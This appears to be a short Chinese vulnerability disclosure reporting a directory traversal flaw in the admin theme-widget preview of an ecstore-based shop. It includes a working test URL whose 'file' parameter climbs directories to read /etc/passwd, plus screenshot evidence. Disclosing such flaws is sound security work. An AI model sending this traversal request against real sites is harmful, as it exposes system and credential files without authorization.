### 简要描述:
后台模板编辑功能可越权查看系统文件
### 详细说明:
file参数对../未做过滤,导致可以跨目录读取文件
测试url:http://shop.xxx.com/index.php/shopadmin/index.php?app=site&ctl=admin_theme_widget&act=preview&theme=ecstore&file=../../../../../etc/passwd
[<img src="https://images.seebug.org/upload/201412/02233108c5e641e40157994bb38a463d7d18ff19.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/02233108c5e641e40157994bb38a463d7d18ff19.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201412/02233617ec2d6faa50283951e40dd6cf94272054.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/02233617ec2d6faa50283951e40dd6cf94272054.png)
暂无评论